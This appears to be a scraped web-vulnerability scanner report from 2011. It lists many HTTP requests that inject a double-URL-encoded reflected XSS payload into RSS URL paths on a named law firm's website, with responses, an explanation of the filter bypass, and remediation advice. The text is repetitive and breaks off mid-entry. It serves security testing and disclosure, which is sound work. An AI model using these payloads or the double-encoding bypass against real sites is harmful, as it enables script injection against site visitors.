GET /rss/practices/Health_Caref87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 was submitted in the REST URL parameter 4. This input was echoed as f1cbf"><script>alert(1)</script>efc92306738 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Health_Care/rss.xmlf1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532 was submitted in the REST URL parameter 1. This input was echoed as 7953a"><script>alert(1)</script>a4cf2c1a532 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532/practices/Insurance/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e was submitted in the REST URL parameter 2. This input was echoed as a0999"><script>alert(1)</script>5bd9f5471e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesa0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e/Insurance/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e was submitted in the REST URL parameter 3. This input was echoed as a3861"><script>alert(1)</script>021aa92fc8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Insurancea3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 was submitted in the REST URL parameter 4. This input was echoed as dc903"><script>alert(1)</script>8c3f9de4a75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Insurance/rss.xmldc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708 was submitted in the REST URL parameter 1. This input was echoed as a8cc0"><script>alert(1)</script>97bf63e9708 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssa8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708/practices/Intellectual_Property/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035 was submitted in the REST URL parameter 2. This input was echoed as ebee6"><script>alert(1)</script>8cb5eed4035 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035/Intellectual_Property/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c was submitted in the REST URL parameter 3. This input was echoed as 9a6c9"><script>alert(1)</script>f1282db072c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Intellectual_Property9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa was submitted in the REST URL parameter 4. This input was echoed as f7748"><script>alert(1)</script>1dd7e1a93aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Intellectual_Property/rss.xmlf7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76 was submitted in the REST URL parameter 1. This input was echoed as d092e"><script>alert(1)</script>1334ddb4b76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssd092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76/practices/International_Trade/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce was submitted in the REST URL parameter 2. This input was echoed as d46e9"><script>alert(1)</script>f30c22f14ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesd46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce/International_Trade/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe was submitted in the REST URL parameter 3. This input was echoed as fca14"><script>alert(1)</script>a76b08aeebe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/International_Tradefca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 was submitted in the REST URL parameter 4. This input was echoed as eb24c"><script>alert(1)</script>6e42435c0a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/International_Trade/rss.xmleb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1 was submitted in the REST URL parameter 1. This input was echoed as 2cd05"><script>alert(1)</script>4aa15667da1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1/practices/Litigation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba was submitted in the REST URL parameter 2. This input was echoed as 2c84a"><script>alert(1)</script>d9dfe2363ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba/Litigation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86 was submitted in the REST URL parameter 3. This input was echoed as 191ff"><script>alert(1)</script>238461b7a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Litigation191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d was submitted in the REST URL parameter 4. This input was echoed as 14505"><script>alert(1)</script>478d1333f6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Litigation/rss.xml14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42 was submitted in the REST URL parameter 1. This input was echoed as dc84f"><script>alert(1)</script>79d0e014d42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssdc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42/practices/Postal/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38 was submitted in the REST URL parameter 2. This input was echoed as 4a669"><script>alert(1)</script>6384682ca38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
